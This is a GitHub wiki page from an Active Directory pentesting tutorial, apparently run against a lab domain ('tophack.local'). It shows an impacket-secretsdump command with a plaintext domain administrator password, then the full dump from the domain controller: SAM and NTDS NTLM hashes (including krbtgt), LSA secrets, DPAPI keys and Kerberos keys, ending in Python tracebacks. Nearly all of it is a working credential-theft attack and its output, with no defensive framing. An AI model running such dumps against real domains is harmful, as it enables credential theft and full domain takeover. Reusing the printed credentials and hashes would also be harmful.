Dumping Hashes - maxbirnbacher/ADPentesting101 GitHub Wiki
impacket-secretsdump
Use impacket-secretsdump with an account that has domain administrator rights
impacket-secretsdump tophack.local/sch:'Reg13rungsr4t!'@172.27.12.20
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x19dfe74b531c97add88558ca40b15b3e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e52d9c51eade9526fb936c716ec3dde1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account does not have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TOPHACK\TOPHACK-DC$:aes256-cts-hmac-sha1-96:7168731271ced0463874bd3b218d0dca0b1b84f7b025ea88841a7d2804f7e7f0
TOPHACK\TOPHACK-DC$:aes128-cts-hmac-sha1-96:088c9af2cd40200b3e87a1fc7e232387
TOPHACK\TOPHACK-DC$:des-cbc-md5:6e3d3d89e0ae98fd
TOPHACK\TOPHACK-DC$:plain_password_hex:b659b89d8e76f67addd8e4ee760330e722956550db9613c3dc6bb779b563dfa28680318f6dab45e1a11191dda78fec7f74225f5d8a25fa36e00afbf450b340ff38cf68d1f1fdeff3fdabab4278850032731c39dc83f63195e4d880a3a954a1a1e5de7c689cdb86caa767465762e10051c4348e55b673f09533b82e8165d7ce9083d3f004ecf3ded8434373600d7358ad09832ef761485998fdf1b67a9bff4c0a143633906ac0c56c1c3de3120fd0d3faa82e11da636b8274162de3d050656e909c8221cf072fcf74a098284b8ae494bdfc0fa0e9446a32fe7a8abb5a321bbb607def07db7ecdd10cb62a225fabfc473e
TOPHACK\TOPHACK-DC$:aad3b435b51404eeaad3b435b51404ee:e2acec3e5c9c55f828759fe006e1aa41:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x4222ba9badc9f247d7892808db941468697a73fc
dpapi_userkey:0x482892b517eceff83b5d0fae6e39255c1c071bd1
[*] NL$KM
0000 7A 47 40 87 AA 5F 25 C9 90 C6 20 10 30 10 71 85 zG@.._%... .0.q.
0010 9C 99 60 7F 2C 62 BA 94 53 4D 7C 51 20 96 14 B9 .. .,b..SM|Q ...
0020 B0 E5 17 9A 56 5C D6 EF 6A 59 E7 9E 61 9E 7B 8E ....V\..jY..a.{.
0030 E3 8E A5 29 2E A8 39 94 2E B5 96 A2 3A 42 4B 9B ...)..9.....:BK.
NL$KM:7a474087aa5f25c990c62010301071859c99607f2c62ba94534d7c51209614b9b0e5179a565cd6ef6a59e79e619e7b8ee38ea5292ea839942eb596a23a424b9b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e52d9c51eade9526fb936c716ec3dde1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1d879d33bf1877043e9ec7fcd5f4fa84:::
tophack.local\aba:1104:aad3b435b51404eeaad3b435b51404ee:ae974876d974abd805a989ebead86846:::
tophack.local\wes:1105:aad3b435b51404eeaad3b435b51404ee:c9ab9d08cc7da5a55d8a82d869e01ea8:::
tophack.local\sch:1106:aad3b435b51404eeaad3b435b51404ee:aa178f7b785402157169c591dbcc17b8:::
tophack.local\saa:1107:aad3b435b51404eeaad3b435b51404ee:5d68368c21f0478d118ab71ebd15a806:::
tophack.local\ram:1108:aad3b435b51404eeaad3b435b51404ee:6be408f1e80386822f4b2052f1f84b4e:::
tophack.local\jeh:1109:aad3b435b51404eeaad3b435b51404ee:766b62d3db023f90443469d86393ca66:::
tophack.local\woh:1110:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
tophack.local\florian_adm:1111:aad3b435b51404eeaad3b435b51404ee:81a71dc5e4a240a1b610911650bf172e:::
JohnDoe:1116:aad3b435b51404eeaad3b435b51404ee:3124e60c7c43f392f0db55ec5b4a92f6:::
klebera:1117:aad3b435b51404eeaad3b435b51404ee:95a4addfbb2e9b8a37b0d9ef5f80e8d9:::
TOPHACK-DC$:1000:aad3b435b51404eeaad3b435b51404ee:e2acec3e5c9c55f828759fe006e1aa41:::
DESKTOP-S47PQR4$:1112:aad3b435b51404eeaad3b435b51404ee:9b471204602946ac49e5578ee1d30089:::
WINPC1$:1113:aad3b435b51404eeaad3b435b51404ee:9911ffb9dde5dda4b87d64f06e9a5fed:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:6a122c99a8e6f602e6e27cb35e07f7d874b2594e425ef0c8bb2bcd9b5f69decd
Administrator:aes128-cts-hmac-sha1-96:404065850255bae58e8c2bca4a2cf206
Administrator:des-cbc-md5:15fd97b3ab29fb3d
krbtgt:aes256-cts-hmac-sha1-96:74bc673438c403b38f8cf54eef094c2f771d78cdd024dcdf97390eee2959b7b0
krbtgt:aes128-cts-hmac-sha1-96:71353e5537dc0195fc4e304b7ee859ca
krbtgt:des-cbc-md5:ef256e10163264d9
tophack.local\aba:aes256-cts-hmac-sha1-96:d240741608ccbed6de5c6eb6655fa3eb85516dd45f77ff24af63d5fc3fceff89
tophack.local\aba:aes128-cts-hmac-sha1-96:110e23d13730a061986c1aa7bf60c2d0
tophack.local\aba:des-cbc-md5:c7e96e6b0db38c9e
tophack.local\wes:aes256-cts-hmac-sha1-96:71cae8b17f8c5e71f654a5e33b06ec3c417c9a62028c6396cb72f0ca488d6f52
tophack.local\wes:aes128-cts-hmac-sha1-96:420e06abb75bef240dd6c42c22025b66
tophack.local\wes:des-cbc-md5:8a08df8af192bc8c
tophack.local\sch:aes256-cts-hmac-sha1-96:ced586ab684bb20af85962cd823eae007ac6143da8c67b2008a59527313f05cf
tophack.local\sch:aes128-cts-hmac-sha1-96:8ca35219e925374dcd2afd99d4d0b173
tophack.local\sch:des-cbc-md5:43923d0762aeb0c8
tophack.local\saa:aes256-cts-hmac-sha1-96:59e26084af80d0c8a4eff57818060575b9b0f08a684ea5195db520a3ac577c08
tophack.local\saa:aes128-cts-hmac-sha1-96:391cc3723b536c8411a9ae779114dfe0
tophack.local\saa:des-cbc-md5:043dd33efe8f388c
tophack.local\ram:aes256-cts-hmac-sha1-96:cc973b6dddda7547f5b1340f790f85aabd65d6341a84cea0f9054647aa7eef9f
tophack.local\ram:aes128-cts-hmac-sha1-96:790bf6fd962f16fd6fa7d34d4ebb2554
tophack.local\ram:des-cbc-md5:980d7554dcce15a4
tophack.local\jeh:aes256-cts-hmac-sha1-96:475c3ee295a9f3ad6aa4270c84ef4bf11dd14d0ccbd331344704321566c72ea3
tophack.local\jeh:aes128-cts-hmac-sha1-96:91bb17d1eaaaacef220d34afc405416e
tophack.local\jeh:des-cbc-md5:6e6d2f0294fe1a46
tophack.local\woh:aes256-cts-hmac-sha1-96:9524feedcd6f7904eb6460f52ea47c84e944910f6e137e39a2e155d6e7e75221
tophack.local\woh:aes128-cts-hmac-sha1-96:76d88cd4e3719d5d7d9982612e8dbae4
tophack.local\woh:des-cbc-md5:e04f15f76445739d
tophack.local\florian_adm:aes256-cts-hmac-sha1-96:85673279ba408a1b17139b9cb891b007df32fcfd869705e38c67ef0fc9099676
tophack.local\florian_adm:aes128-cts-hmac-sha1-96:cfb717a644d15a7392c234f3fc7fa376
tophack.local\florian_adm:des-cbc-md5:342a52ae08bf23d9
JohnDoe:aes256-cts-hmac-sha1-96:bf9ed502ac3e54b5542ad8d5c2cca70c6fc899e87cc3ecc9bbefd45e741f8157
JohnDoe:aes128-cts-hmac-sha1-96:989868c78c29f94cc6958fe271d8727f
JohnDoe:des-cbc-md5:975246a4321c19da
klebera:aes256-cts-hmac-sha1-96:9b44035b5cbda7cbb16bf6c7589ff1e794c0a4ec231f6c8c37a9c00972ea515e
klebera:aes128-cts-hmac-sha1-96:5db0b0d02070f71f72b93a1ccae4a48e
klebera:des-cbc-md5:bfe383a2379b3e7c
TOPHACK-DC$:aes256-cts-hmac-sha1-96:7168731271ced0463874bd3b218d0dca0b1b84f7b025ea88841a7d2804f7e7f0
TOPHACK-DC$:aes128-cts-hmac-sha1-96:088c9af2cd40200b3e87a1fc7e232387
TOPHACK-DC$:des-cbc-md5:9d3b2f54730e198c
DESKTOP-S47PQR4$:aes256-cts-hmac-sha1-96:b7ca136b8ecd068d68aea837290dc50256b34bbb9c86671b4749b2fd119b50c5
DESKTOP-S47PQR4$:aes128-cts-hmac-sha1-96:982a4dce6ea6e20803184c31e02d9938
DESKTOP-S47PQR4$:des-cbc-md5:43683ea4a4526b10
WINPC1$:aes256-cts-hmac-sha1-96:7afbafdfa033f05fd30bf3f030f775682e04c107151bfb1851eb219bff16a397
WINPC1$:aes128-cts-hmac-sha1-96:801332a199ccdf5d40387f308d8843a1
WINPC1$:des-cbc-md5:983dfbd9d097d0e3
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f3a31b36660>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 179, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 358, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 603, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1305, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 423, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 392, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 148, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 232, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f3a31b36660>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 179, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 358, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 603, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1305, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 423, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 392, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 148, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 232, in new
KeyError: 'Cryptodome.Cipher.AES'